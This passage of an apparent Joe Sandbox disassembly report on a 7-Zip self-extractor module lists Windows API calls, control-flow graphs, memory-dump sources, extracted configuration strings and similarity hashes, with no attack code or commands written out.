                                                                                                                                                                                                                                            • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                                                                                                                                                                                            • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                                                                                                                                                                                            • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                                                                                                                                                                                            • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405CE6
                                                                                                                                                                                                                                            • Part of subcall function 00404D0B: #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                                                                                                                                                                                            • Part of subcall function 00404D0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                                                                                                                                                                                            • Part of subcall function 00404D0B: wsprintfW.USER32 ref: 00404DB8
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00405D45
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00405D7F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DCE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DE2
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,0041EA30), ref: 00405DEA
                                                                                                                                                                                                                                            • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                                                                                            • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000208), ref: 00405E61
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00405F89
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,0041EA30,0041EA30), ref: 00406118
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,0041EA30,0041EA30), ref: 0040619B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041EA30,0041EA30), ref: 00406211
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 0040622D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041EA30,0041EA30), ref: 0040626B
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00406295
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 004064B6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00406587
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004065D4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 004065DC
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 004065FB
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406653
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 0040665B
                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(?,00000000,?,?), ref: 004066C3
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040673B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00406743
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040674B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00406753
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040675B
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 00406767
                                                                                                                                                                                                                                          • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0040676E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040678A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00406792
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040679A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067A2
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004067BE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004067C6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067CE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067D6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,00000000,?,?), ref: 0040687F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00000000,?,?), ref: 004068A4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?), ref: 00406916
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00406937
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00406991
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00406A68
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406A8B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00406AC4
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 00406B1B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406C59
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406C67
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C92
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C9A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406CB6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406CBE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00406CEE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D2E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D97
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0041E9E8), ref: 00406D9F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E64
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E6F
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E79
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F33
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F3B
                                                                                                                                                                                                                                          • _wtol.MSVCRT ref: 00406FCF
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 004071AE
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,?,?,?,?), ref: 004071B6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004071DA
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407223
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040722B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407233
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407239
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407249
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407251
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040726E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407276
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040727E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407286
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040728E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041E9E8), ref: 004072AF
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041E9E8), ref: 004072B7
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004072C3
                                                                                                                                                                                                                                            • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                                                                                            • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                                                                                            • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                                                                                            • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                                                                                            • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                                                                                            • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                                                                                            • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 004072E4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 004072EC
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 004072F4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 004072FA
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00407302
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 0040730A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00407312
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407331
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00407339
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407341
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407347
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00407380
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004073AA
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040746E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407476
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040748D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004074A1
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004074A9
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 004074C2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$Message_wtol$lstrlen$??2@wsprintf$CommandCurrentFileFormatLineModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCallbackCreateDirectoryDispatchDispatcherErrorFolderFreeHandleInitializeKillLastLocalNamePathSizeSpecialStateUserVersionWindowWorkingwvsprintf
                                                                                                                                                                                                                                          • String ID: " -$$A$0A$0A$0A$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$7zSfxVarCmdLine0$7zSfxVarCmdLine1$7zSfxVarCmdLine2$7zSfxVarModulePlatform$7zSfxVarSystemLanguage$7zSfxVarSystemPlatform$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$pA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$A$A$A
                                                                                                                                                                                                                                          • API String ID: 1301190434-1447873201
                                                                                                                                                                                                                                          • Opcode ID: 10cb7091d2b9d3da38b27ec7869b728c13af1da3f3d545d26808bf40333ee74a
                                                                                                                                                                                                                                          • Instruction ID: 37b3d77bb6f8fb102f6eda89de8ddb12e9592f0eac1975534991a7b966549d26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10cb7091d2b9d3da38b27ec7869b728c13af1da3f3d545d26808bf40333ee74a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69E2E271904208AADF25AF62DC46AEE3768EF04304F54403BFD06B61D2EB7D9991CB5E

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,0041A68C,?,?,?,00000000), ref: 0040320B
                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,0041A688,?,0000005C,?,?,?,00000000), ref: 0040325E
                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,0041A680,?,?,00000000), ref: 00403274
                                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,?,0000005C,?,?,?,00000000), ref: 0040328A
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000000), ref: 00403291
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010,?,?,00000000), ref: 004032A3
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,00000000), ref: 004032B2
                                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000), ref: 004032BD
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000), ref: 004032C6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032D1
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032DC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1862581289-0
                                                                                                                                                                                                                                          • Opcode ID: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                                                                                                                                                                                          • Instruction ID: 78ea6f58b6c007c21ca8543ec41bf80dc5d167b0896979d67dadc0a8fcb0d376
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86216131601208BADB11AF61EC59EFE3B7CAF44746F1444BAF405B21D1EB389B45CA69

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1142 4039e7-403a0d lstrlenW call 402a67 1145 403a18-403a24 1142->1145 1146 403a0f-403a13 call 4011b7 1142->1146 1148 403a26-403a2a 1145->1148 1149 403a2c-403a32 1145->1149 1146->1145 1148->1149 1150 403a35-403a37 1148->1150 1149->1150 1151 403a5b-403a64 call 401e6b 1150->1151 1154 403a66-403a79 GetSystemTimeAsFileTime GetFileAttributesW 1151->1154 1155 403a4a-403a4c 1151->1155 1156 403a92-403a9b call 401e6b 1154->1156 1157 403a7b-403a89 call 40367d 1154->1157 1158 403a39-403a41 1155->1158 1159 403a4e-403a50 1155->1159 1172 403aac-403aae 1156->1172 1173 403a9d-403aaa call 409606 1156->1173 1157->1156 1171 403a8b-403a8d 1157->1171 1158->1159 1164 403a43-403a47 1158->1164 1160 403a56 1159->1160 1161 403b0a-403b10 1159->1161 1160->1151 1167 403b12-403b1d 1161->1167 1168 403b3a-403b4d call 409606 ??3@YAXPAX@Z 1161->1168 1164->1159 1169 403a49 1164->1169 1167->1168 1174 403b1f-403b23 1167->1174 1183 403b4f-403b53 1168->1183 1169->1155 1178 403b2f-403b38 ??3@YAXPAX@Z 1171->1178 1175 403ab0-403acf memcpy 1172->1175 1176 403afe-403b08 ??3@YAXPAX@Z 1172->1176 1173->1171 1174->1168 1180 403b25-403b2a 1174->1180 1181 403ad1 1175->1181 1182 403ae4-403ae8 1175->1182 1176->1183 1178->1183 1180->1168 1185 403b2c-403b2e 1180->1185 1186 403ae3 1181->1186 1187 403ad3-403adb 1182->1187 1188 403aea-403af7 call 401e6b 1182->1188 1185->1178 1186->1182 1187->1188 1189 403add-403ae1 1187->1189 1188->1173 1192 403af9-403afc 1188->1192 1189->1186 1189->1188 1192->1175 1192->1176
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                                                                                                                                                                                            • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                                                                                            • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(-00000001,00401A74,?,?,?,?,?,00401A74,?), ref: 00403AC2
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00401A74,?), ref: 00403AFF
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00401A74,00401A74,?,?,?,?,00401A74,?), ref: 00403B45
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 846840743-0
                                                                                                                                                                                                                                          • Opcode ID: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                                                                                                                                                                                          • Instruction ID: 952cd346550c55d7e35c26256f51fad4d5ed31c9206aabe41908170679320093
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4141E836A00112AADB20AF59C841ABF7B7CEB4170AF50413BEC81B21D1D77D5A4286DD

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1222 402665-402684 LoadLibraryA GetProcAddress 1223 402692-402695 1222->1223 1224 402686-402691 GetNativeSystemInfo 1222->1224
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32
                                                                                                                                                                                                                                          • API String ID: 2103483237-3846845290
                                                                                                                                                                                                                                          • Opcode ID: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                                                                                                                                                                                          • Instruction ID: 08739c12cb3b948957cf2c0406c7fd7347f4194bf9f07d28511d247575205d7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAD05EB0A0520576CB00ABB15D0E9EB7AEC5A48608B144461A806F00C5EAADDD90C36A

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1264 40367d-403694 GetFileAttributesW 1265 403696-403698 1264->1265 1266 40369a-40369c 1264->1266 1267 4036f3-4036f5 1265->1267 1268 4036ab-4036b2 1266->1268 1269 40369e-4036a9 SetLastError 1266->1269 1270 4036b4-4036bb call 403650 1268->1270 1271 4036bd-4036c0 1268->1271 1269->1267 1270->1267 1273 4036f0-4036f2 1271->1273 1274 4036c2-4036d3 FindFirstFileW 1271->1274 1273->1267 1274->1270 1276 4036d5-4036ee FindClose CompareFileTime 1274->1276 1276->1270 1276->1273
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 0040368B
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000010), ref: 004036A0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
